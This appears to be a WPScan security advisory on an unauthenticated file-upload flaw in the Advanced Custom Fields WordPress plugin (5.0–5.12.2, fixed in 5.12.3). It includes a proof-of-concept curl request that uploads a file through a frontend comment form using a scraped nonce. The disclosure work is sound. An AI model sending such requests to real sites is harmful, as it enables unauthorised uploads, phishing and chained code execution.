WordPress Plugin Vulnerabilities
Advanced Custom Fields 5.0-5.12.2 - Unauthenticated File Upload
Description
The plugin allows unauthenticated users to upload files allowed in a default WP configuration (so PHP is not possible) if there is a frontend form available. This vulnerability was introduced in the 5.0 rewrite and did not exist prior to that release.
By default WordPress does not allow uploading of .php files so this vulnerability is not easily wormable, but there are many other file types that can be uploaded that can be then used with another exploit to execute code or used in a phishing attack to get a user to download and execute a resource from a "trusted" site.
Proof of Concept
The nonce is retrieved from a form in the frontend curl \ -i -s -k -X 'POST' \ -F "comment=Test comment" \ -F '_acf_post_id=1' \ -F '_acf_validation=1' \ -F '_acf_nonce=ba2ef314e0' \ -F '_acf_changed=0' \ -F 'acf[field_62c8939d255d8]=Something' \ -F 'author=testing' \ -F 'email=testing@example.com' \ -F 'url=' \ -F 'submit=Post+Comment' \ -F 'comment_post_ID=1' \ -F 'comment_parent=0' \ -F 'acf[name]=@rickroll.mp4' \ 'http://play.local/wp-comments-post.php'
Affects Plugins
Fixed in 5.12.3
Fixed in 5.12.3 References
Miscellaneous
Original Researcher
James Golovich
Submitter
Pritect
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-08-01 (about 1 years ago)
Added
2022-08-01 (about 1 years ago)
Last Updated
2023-05-04 (about 1 years ago)
WPScan 